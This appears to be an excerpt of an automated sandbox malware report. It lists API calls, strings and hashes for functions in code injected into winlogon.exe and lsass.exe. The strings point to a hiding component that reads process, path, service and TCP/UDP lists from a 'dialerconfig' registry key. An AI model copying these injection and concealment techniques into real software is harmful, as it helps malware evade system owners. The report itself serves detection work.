Instruction Fuzzy Hash: B131B1712516808AEF94EF26E84871937A4F740BC8FA585A4BE5F0778CCF38E960C706

Function 000002EA8A6914B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002EA8A6914D5
HeapFree.KERNEL32 ref: 000002EA8A6914E4
GetProcessHeap.KERNEL32 ref: 000002EA8A6914F0
HeapFree.KERNEL32 ref: 000002EA8A6914FF
GetProcessHeap.KERNEL32 ref: 000002EA8A69152A

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: aa27e8e7f79125f1343d22835281ece34ade0f7b32a1f5d1a5472ae50ee12964
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: 3D11483A654BC892EB94DFA6E84821AB3A0F789F84F044069EB8F03758DF3CE4518701

Function 000002EA8A6926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002EA8A6927D4
StrCpyW.SHLWAPI ref: 000002EA8A6927ED

Strings

\\.\pipe\, xrefs: 000002EA8A6927DF

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 7a6ca1c80999430289e0e255be2d5575a816950eb6d131cc4e8ea1efcb847bd8
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 5F71C2322847C145EFA4DF36D9583AAA790F749B84F488076DE4F43B8CDE38E5048742

Function 000002EA8A6924DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002EA8A6925C3
StrCpyW.SHLWAPI ref: 000002EA8A6925DA

Strings

\\.\pipe\, xrefs: 000002EA8A6925CE

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: c2e2c8a0a7ed10ff9d7c15d703bcdc96fdab8d058a3a444099dde12b3b917ad9
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: F651C5322887C142EFA4DE39D55C36AA691F395B80F088075CE8F43F9DCA3DE4058B42

Function 000002EA8A6A0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002EA8A6A071B
GetLastError.KERNEL32 ref: 000002EA8A6A073D

Strings

U, xrefs: 000002EA8A6A06C7

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: fd184c2efed707c6206db00b1476f8f653f07e565882e92135d22bf5a263b94d
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: B541C472754A8081EFA0DF25E4483AAB7A0F798794F454035EE4E8779CEB3CE541DB41

Function 000002EA8A69D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002EA8A69D6F9
LCMapStringW.KERNEL32 ref: 000002EA8A69D781

Strings

LCMapStringEx, xrefs: 000002EA8A69D6DC, 000002EA8A69D6ED

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: e9967a6faf523a4465f8fbc59a11bb6c3ef7598bbdaa2fcf69ef1fd245409858
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: C8111D36608BC086DBA0CB15F88429AB7A4F7C9B90F544176EE8E83B5DDF38D450CB00

Function 000002EA8A6994A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002EA8A6994E8
RaiseException.KERNEL32 ref: 000002EA8A69952E

Strings

csm, xrefs: 000002EA8A69951B

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 3ef8e3cf5ffba142c337f469f2c331b3eb387ccd0eda3412027d9d972781c63a
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: AD111C36218BC082EFA1CF15E44425AB7A5F788B98F188261DF8E07B68DF3CD555CB00

Function 000002EA8A69D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002EA8A69D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002EA8A69D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002EA8A69D681

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 3dcfd634d21ba109975813ae23278bd7e87620fd4f5aa7bec3cb40b24832763a
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 3EF0BE253507D081EE84EB41F8082942360EB88B90F4890B1AA5F03B5DCE3CE894DB02

Function 000002EA8A66CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002EA8A66CBC5

Strings

October, xrefs: 000002EA8A66CBBE
November, xrefs: 000002EA8A66CBA8, 000002EA8A66CBB2

Memory Dump Source

Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 9bf7f2595c637e6ce5aec44b6edb03a55e5d6912680e34b5d78f5ca36353a619
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: F6E092712919C192EF85EB92F84C2E423629B98740F5951B2961F0665ECE38E8868742

Function 000002EA8A6ECB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002EA8A6ECBC5

Strings

November, xrefs: 000002EA8A6ECBA8, 000002EA8A6ECBB2
October, xrefs: 000002EA8A6ECBBE

Memory Dump Source

Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: ac630fe7209f2f2623aaf96e66dd013462e14f33e34b521b596fee436c1c39d3
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 2FE022612806C192EF84EB11F40C2E423209B84350F6950B1B61F0665ECE38E8928343

Function 000002EA8A69D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002EA8A69D631
TlsSetValue.KERNEL32 ref: 000002EA8A69D648

Strings

FlsSetValue, xrefs: 000002EA8A69D61E

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 65096851b176616538e16ec35cef30521fd5aefe84949005b545887b2a3e0ed0
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 6EE06D612406C1D1EE84DB60F80C6946322AB88780F4C90B2D91F0629ECE3CF855D702

Function 000002EA8A691D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002EA8A691D9B
HeapAlloc.KERNEL32 ref: 000002EA8A691DAA
GetProcessHeap.KERNEL32 ref: 000002EA8A691E1E
HeapFree.KERNEL32 ref: 000002EA8A691E2C

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 7f1436bbda5468e2430b285601fe1896a77bd5c8b730eeeaaa4c1ff92e47dd08
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 7E21A736644BD081EF91CF59E40825AF3A0FB84B94F594120DE8E47B28EF7CE5468701

Function 000002EA8A691274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002EA8A69127A
HeapAlloc.KERNEL32 ref: 000002EA8A691289
GetProcessHeap.KERNEL32 ref: 000002EA8A6912A3
HeapAlloc.KERNEL32 ref: 000002EA8A6912B4

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: c8f31c423029552b4e838745c61b5a2d1be4ecb255ab9d17500941c7e43ef972
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 2BE06575A51A4186EB48CFA2D80834A76E1FB88F01F48C024C90E07364DF7DA89ADB81

Analysis Process: lsass.exePID: 640, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	121
Total number of Limit Nodes:	13

Executed Functions

Function 000001CB338E26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 000001CB338E27D4
StrCpyW.SHLWAPI ref: 000001CB338E27ED

Strings

\\.\pipe\, xrefs: 000001CB338E27DF

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: e1da62206d8d2c85a110a5533f3c9e27e638c71e595c66d34b8ae04b2e4e6411
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: CB71B03225A7C181FB28BB2D99C6BEBA790F745F86F443016DD4983B98DF35CA068740

Function 000001CB338E21CC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000001CB338E2270

Part of subcall function 000001CB338E30B4: GetProcessHeap.KERNEL32 ref: 000001CB338E30D7
Part of subcall function 000001CB338E30B4: HeapAlloc.KERNEL32 ref: 000001CB338E30EA
Part of subcall function 000001CB338E30B4: StrCmpNIW.SHLWAPI ref: 000001CB338E316B
Part of subcall function 000001CB338E30B4: GetProcessHeap.KERNEL32 ref: 000001CB338E31D1
Part of subcall function 000001CB338E30B4: HeapFree.KERNEL32 ref: 000001CB338E31DF

Strings

dialer, xrefs: 000001CB338E2269
S, xrefs: 000001CB338E2391

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction ID: 4f7d307c0559e335cd0b5f09cbb4e9318dad46cc2eb0de8c292a65f9696b20b2
Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction Fuzzy Hash: 4751E732B567A892F760DF699882EEF63A4F744F96F04A411DE45A3B54DB34C842C710

Function 000001CB338E1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001CB338E165B
HeapAlloc.KERNEL32 ref: 000001CB338E166A

Part of subcall function 000001CB338E1274: GetProcessHeap.KERNEL32 ref: 000001CB338E127A
Part of subcall function 000001CB338E1274: HeapAlloc.KERNEL32 ref: 000001CB338E1289
Part of subcall function 000001CB338E1274: GetProcessHeap.KERNEL32 ref: 000001CB338E12A3
Part of subcall function 000001CB338E1274: HeapAlloc.KERNEL32 ref: 000001CB338E12B4

RegOpenKeyExW.ADVAPI32 ref: 000001CB338E16DA
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1707
RegCloseKey.ADVAPI32 ref: 000001CB338E1721
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1741
RegCloseKey.ADVAPI32 ref: 000001CB338E175C
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E177C
RegCloseKey.ADVAPI32 ref: 000001CB338E1797
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E17B7
RegCloseKey.ADVAPI32 ref: 000001CB338E17D2
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E17F2
RegCloseKey.ADVAPI32 ref: 000001CB338E180D
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E182D
RegCloseKey.ADVAPI32 ref: 000001CB338E1848
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1868
RegCloseKey.ADVAPI32 ref: 000001CB338E1883
RegOpenKeyExW.ADVAPI32 ref: 000001CB338E18A3
RegCloseKey.ADVAPI32 ref: 000001CB338E18BE
RegCloseKey.ADVAPI32 ref: 000001CB338E18C8

Part of subcall function 000001CB338E12C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001CB338E1326
Part of subcall function 000001CB338E12C8: GetProcessHeap.KERNEL32 ref: 000001CB338E1334
Part of subcall function 000001CB338E12C8: HeapAlloc.KERNEL32 ref: 000001CB338E1345
Part of subcall function 000001CB338E12C8: RegEnumValueW.ADVAPI32 ref: 000001CB338E13A1
Part of subcall function 000001CB338E12C8: GetProcessHeap.KERNEL32 ref: 000001CB338E13E9
Part of subcall function 000001CB338E12C8: HeapAlloc.KERNEL32 ref: 000001CB338E13F7
Part of subcall function 000001CB338E12C8: GetProcessHeap.KERNEL32 ref: 000001CB338E141B
Part of subcall function 000001CB338E12C8: HeapFree.KERNEL32 ref: 000001CB338E1429
Part of subcall function 000001CB338E12C8: lstrlenW.KERNEL32 ref: 000001CB338E1432
Part of subcall function 000001CB338E12C8: GetProcessHeap.KERNEL32 ref: 000001CB338E1440
Part of subcall function 000001CB338E12C8: HeapAlloc.KERNEL32 ref: 000001CB338E144E

Strings

pid, xrefs: 000001CB338E173A
SOFTWARE\dialerconfig, xrefs: 000001CB338E16BA
tcp_remote, xrefs: 000001CB338E1861
udp, xrefs: 000001CB338E189C
paths, xrefs: 000001CB338E17B0
service_names, xrefs: 000001CB338E17EB
tcp_local, xrefs: 000001CB338E1826
process_names, xrefs: 000001CB338E1775
startup, xrefs: 000001CB338E16FD

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 0019091451c72e0d27f0948c5f081a123cf8ac8bd120305a2c39b47c9ea8070c
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 7C711B76756A9086FB109F66E8C2ADE67A4F784F8AF402112DE4D87B28DF79C446C700

Function 000001CB338E1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001CB338E1AD8
StrCmpNIW.SHLWAPI ref: 000001CB338E1AF2
lstrlenW.KERNEL32 ref: 000001CB338E1B01
StrCpyW.SHLWAPI ref: 000001CB338E1B16

Strings

\\?\, xrefs: 000001CB338E1AE6

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: c5722bb5e5064a267038efca45cdf4e0eea18f6f5f6f0b8e3e8f0b68a3711c8c
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: A8F0A43230968192F7608B24F4D6BDB6760F784F8AF849030CE4886754DF7DC68ACB00

Function 000001CB338E3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001CB338E347A
PathFindFileNameW.SHLWAPI ref: 000001CB338E3489

Part of subcall function 000001CB338E3930: StrCmpNIW.SHLWAPI ref: 000001CB338E3948

Part of subcall function 000001CB338E3878: GetModuleHandleW.KERNEL32 ref: 000001CB338E3886
Part of subcall function 000001CB338E3878: GetCurrentProcess.KERNEL32 ref: 000001CB338E38B4
Part of subcall function 000001CB338E3878: VirtualProtectEx.KERNEL32 ref: 000001CB338E38D6
Part of subcall function 000001CB338E3878: GetCurrentProcess.KERNEL32 ref: 000001CB338E38F4
Part of subcall function 000001CB338E3878: VirtualProtectEx.KERNEL32 ref: 000001CB338E3915

CreateThread.KERNEL32 ref: 000001CB338E34D7

Part of subcall function 000001CB338E1EB4: GetCurrentThread.KERNEL32 ref: 000001CB338E1EBF

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: e4a43e32bc5de21c8982efc44c6a066844a9186fa7c4a81fd91a78ebf9ea1ecd
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 9311A5316AE6C142F7219729F4C7FE72290BB64F0BF4430259D05C5394EFB9C9868310

Function 000001CB338E1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001CB338E1650: GetProcessHeap.KERNEL32 ref: 000001CB338E165B
Part of subcall function 000001CB338E1650: HeapAlloc.KERNEL32 ref: 000001CB338E166A
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E16DA
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1707
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1721
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1741
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E175C
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E177C
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1797
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E17B7
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E17D2
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E17F2

Sleep.KERNEL32 ref: 000001CB338E1C43
SleepEx.KERNELBASE ref: 000001CB338E1C49

Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E180D
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E182D
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1848
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1868
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1883
Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E18A3
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E18BE
Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E18C8

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: cc08532799486a9145d1f56adcd321ce6c85642cf947c6a54071b239b4e24e0e
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: EA311E3538A68191FA509F7AE9C3BDF92A6BB44FC2F1460219E19C7796EF24C8528350

Function 000001CB338B2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001CB338B2A31

Memory Dump Source

Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 65e2e66d8a599a2f6f3418f292e571a5bbeb9f775a3ff3744c9a0b0a5d006b2b
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 7461FD7274A692C3FA68CF159481BAAB391FB04F95F54A121DE1987785DF3CE853C700

Non-executed Functions

Function 000001CB338E2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001CB338E2D80
lstrlenW.KERNEL32 ref: 000001CB338E2FBA

Part of subcall function 000001CB338E1A14: OpenProcess.KERNEL32 ref: 000001CB338E1A3A
Part of subcall function 000001CB338E1A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001CB338E1A58
Part of subcall function 000001CB338E1A14: PathFindFileNameW.SHLWAPI ref: 000001CB338E1A67
Part of subcall function 000001CB338E1A14: lstrlenW.KERNEL32 ref: 000001CB338E1A73
Part of subcall function 000001CB338E1A14: StrCpyW.SHLWAPI ref: 000001CB338E1A86
Part of subcall function 000001CB338E1A14: CloseHandle.KERNEL32 ref: 000001CB338E1A94

GetProcAddress.KERNEL32 ref: 000001CB338E2D95

Part of subcall function 000001CB338E1554: StrCmpIW.SHLWAPI ref: 000001CB338E1585

Part of subcall function 000001CB338E3930: StrCmpNIW.SHLWAPI ref: 000001CB338E3948

StrCmpNIW.SHLWAPI ref: 000001CB338E2DD8
lstrlenW.KERNEL32 ref: 000001CB338E2F00

Strings

\Device\Nsi, xrefs: 000001CB338E2DCB
ntdll.dll, xrefs: 000001CB338E2D79
NtQueryObject, xrefs: 000001CB338E2D8B

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 7080cbd7cdb41b6b188b0ba784345d16a0fd56170d5fe49ac494bddbe1a3a953
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: EEB1B03225A6D082FB64AF29D482BEB63A4FB44F86F147016EE4993794DF75CD42C340

Function 000001CB338E7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001CB338E7E8C
